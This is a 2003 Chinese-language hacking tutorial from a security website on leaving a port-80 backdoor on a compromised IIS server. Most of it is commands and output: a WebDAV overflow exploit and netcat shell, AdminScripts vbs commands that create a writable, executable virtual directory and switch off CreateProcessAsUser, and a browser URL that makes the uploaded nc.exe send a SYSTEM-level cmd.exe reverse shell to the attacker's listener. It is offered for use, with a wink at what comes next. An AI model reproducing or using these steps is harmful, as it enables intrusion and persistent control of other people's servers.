首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>本站原創>windows原創>文章內容
用AdminScripts下的vbs工具在80端口留后門
來源:vittersafe.yeah.net 作者:vitter 發布時間:2003-05-04  

用AdminScripts下的vbs工具在80端口留后門by:[email protected]最近沒事研究了研究AdminScripts下20個vbs工具,小有心得,與大家分享:)IIS是目前比較流行的www服務器,設置不當漏洞就很多。入侵IIS服務器后留下后門,以后就可以隨時控制。一般的后門程序都是打開一個特殊的端口來監聽,比如有nc,ntlm,rnc等等都是以一種類telnet的方式在服務器端監聽遠程的連接控制。不過一個比較防范嚴密的www站點(他們的管理員吃了苦頭后)一般通過防火墻對端口進行限制,這樣除了管理員開的端口外,其他端口就不能連接了。但是80端口是不可能關閉的(如果管理員沒有吃錯藥)。那么我們可以通過在80端口留后門,來開啟永遠的后門。 當IIS啟動CGI應用程序時,缺省用CreateProcessAsUser API來創建該CGI的新Process,該程序的安全上下文就由啟動該CGI的用戶決定。一般匿名用戶都映射到IUSR_computername這個賬號,當然可以由管理員改為其他的用戶。或者由瀏覽器提供一個合法的用戶。兩者的用戶的權限都是比較低,可能都屬于guest組的成員。其實我們可以修改IIS開啟CGI的方式,來提高權限。我們來看IIS主進程本身是運行在localsystem賬號下的,所以我們就可以得到最高localsystem的權限。 1. 入侵IIS得到一個shell,比如:IIS WebDAV overflow remote exploitJ:\tool>webdavx3.pl 10.16.69.55 80J:\tool>nc -vv 10.16.69.55 2000vitter [10.16.69.55] 2000 (?) openMicrosoft Windows 2000 [Version 5.00.2195](C) 版權所有 1985-1998 Microsoft Corp.2. cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root Microsoft (R) Windows 腳本宿主版本 5.1 for Windows版權所有(C) Microsoft Corporation 1996-1999. All rights reserved.KeyType : (STRING) "IIsWebVirtualDir"AccessRead : (BOOLEAN) TrueAccessWrite : (BOOLEAN) FalseAccessExecute : (BOOLEAN) FalseAccessScript : (BOOLEAN) TrueAccessSource : (BOOLEAN) FalseAccessNoRemoteRead : (BOOLEAN) FalseAccessNoRemoteWrite : (BOOLEAN) FalseAccessNoRemoteExecute : (BOOLEAN) FalseAccessNoRemoteScript : (BOOLEAN) FalseHttpErrors : (LIST) (32 Items) "400,*,FILE,F:\WINNT\help\iisHelp\common\400.htm" "401,1,FILE,F:\WINNT\help\iisHelp\common\401-1.htm" "401,2,FILE,F:\WINNT\help\iisHelp\common\401-2.htm" "401,3,FILE,F:\WINNT\help\iisHelp\common\401-3.htm" "401,4,FILE,F:\WINNT\help\iisHelp\common\401-4.htm" "401,5,FILE,F:\WINNT\help\iisHelp\common\401-5.htm" "403,1,FILE,F:\WINNT\help\iisHelp\common\403-1.htm" "403,2,FILE,F:\WINNT\help\iisHelp\common\403-2.htm" "403,3,FILE,F:\WINNT\help\iisHelp\common\403-3.htm" "403,4,FILE,F:\WINNT\help\iisHelp\common\403-4.htm" "403,5,FILE,F:\WINNT\help\iisHelp\common\403-5.htm" "403,6,FILE,F:\WINNT\help\iisHelp\common\403-6.htm" "403,7,FILE,F:\WINNT\help\iisHelp\common\403-7.htm" "403,8,FILE,F:\WINNT\help\iisHelp\common\403-8.htm" "403,9,FILE,F:\WINNT\help\iisHelp\common\403-9.htm" "403,10,FILE,F:\WINNT\help\iisHelp\common\403-10.htm" "403,11,FILE,F:\WINNT\help\iisHelp\common\403-11.htm" "403,12,FILE,F:\WINNT\help\iisHelp\common\403-12.htm" "403,13,FILE,F:\WINNT\help\iisHelp\common\403-13.htm" "403,15,FILE,F:\WINNT\help\iisHelp\common\403-15.htm" "403,16,FILE,F:\WINNT\help\iisHelp\common\403-16.htm" "403,17,FILE,F:\WINNT\help\iisHelp\common\403-17.htm" "404,*,FILE,F:\WINNT\help\iisHelp\common\404b.htm" "405,*,FILE,F:\WINNT\help\iisHelp\common\405.htm" "406,*,FILE,F:\WINNT\help\iisHelp\common\406.htm" "407,*,FILE,F:\WINNT\help\iisHelp\common\407.htm" "412,*,FILE,F:\WINNT\help\iisHelp\common\412.htm" "414,*,FILE,F:\WINNT\help\iisHelp\common\414.htm" "500,12,FILE,F:\WINNT\help\iisHelp\common\500-12.htm" "500,13,FILE,F:\WINNT\help\iisHelp\common\500-13.htm" "500,15,FILE,F:\WINNT\help\iisHelp\common\500-15.htm" "500,100,URL,/iisHelp/common/500-100.asp"DefaultDoc : (STRING) "default.html,Default.asp,index.php,index.asp,index.htm"Path : (STRING) "C:\Inetpub\wwwroot"AccessFlags : (INTEGER) 513ScriptMaps : (LIST) (13 Items) ".asp,F:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE" ".cer,F:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE" ".cdx,F:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE" ".asa,F:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE" ".htr,F:\WINNT\System32\inetsrv\404.dll,1,GET,POST" ".idc,F:\WINNT\System32\inetsrv\404.dll,1,OPTIONS,GET,HEAD,POST,PUT,DELETE,TRACE" ".shtm,F:\WINNT\System32\inetsrv\404.dll,1,GET,POST" ".shtml,F:\WINNT\System32\inetsrv\404.dll,1,GET,POST" ".stm,F:\WINNT\System32\inetsrv\404.dll,1,GET,POST" ".php,D:\php\php-4.2.2-Win32\php.exe,1" ".php3,D:\php\php-4.2.2-Win32\php.exe,1" ".cgi,D:\USR\BIN\perl.exe %s %s,1" ".pl,D:\USR\BIN\perl.exe %s %s,1"[/w3svc/1/root/localstart.asp][/w3svc/1/root/bbs][/w3svc/1/root/count][/w3svc/1/root/download][/w3svc/1/root/file][/w3svc/1/root/liuyan][/w3svc/1/root/old][/w3svc/1/root/wsjc][/w3svc/1/root/guest][/w3svc/1/root/test][/w3svc/1/root/zdzxroot][/w3svc/1/root/wins][/w3svc/1/root/udbbbs][/w3svc/1/root/safe][/w3svc/1/root/novel]獲得一些基本信息,現在我們心里已經有底了!3. mkdir c:\inetpub\wwwroot\dir 4. cscript.exe c:\Inetpub\AdminScripts\mkwebdir.vbs -c 10.16.69.55 -w "默認 Web 站點" -v "VirtualDir","c:\inetpub\wwwroot\dir" 這樣就建好了一個虛目錄:VirtualDir 你可以用第2步的命令看一下5. 接下來要改變一下VirtualDir的屬性為execute cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/VirtualDir/accesswrite "true" -s:"10.16.69.55" cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/VirtualDir/accessexecute "true" -s:"10.16.69.55"現在你已經可以upload 內容到該目錄,并且可以運行。你可以把cmd.exe net.exe nc.exe tftp.exe直接拷貝到虛擬目錄的磁盤目錄中,用tftp upload東東到該目錄。 6. 以下命令通過修改iis metabase 來迫使iis以本身的安全環境來創建新的CGI process cscript c:\Inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/VirtualDir/createprocessasuser false7. 在本地用nc監聽一個端口J:\tool>nc -l -p 3000 -nvv8. 在遠程目標系統用nc發送回shell在ie瀏覽器地址欄里面輸入http://10.16.69.55/VirtualDir/nc.exe?-e%20cmd.exe%20-n%2010.16.69.1%203000切換回你的nc監聽程序即可:J:\tool>nc -l -p 3000 -nvvlistening on [any] 3000 ...connect to [10.16.69.1] from (UNKNOWN) [10.16.69.55] 1083Microsoft Windows 2000 [Version 5.00.2195](C) 版權所有 1985-1998 Microsoft Corp.c:\inetpub\wwwroot\dir>whoamiwhoamiNT AUTHORITY\SYSTEM下面你知道該怎么做了吧,呵呵:)


 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·突破網關限制上qq
·windows下用openssh、ant、vss控
·控制臺下修改系統驅動狀態的程序
·Win平臺上如何寫ShellCode
·IPSec Filer
·netserve安全缺陷
·安裝windows2000
  相關文章
·IPSec Filer
·控制臺下修改系統驅動狀態的程序
·Win平臺上如何寫ShellCode
·netserve安全缺陷
·突破網關限制上qq
·安裝windows2000
·windows下用openssh、ant、vss控
  推薦廣告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
期本期特码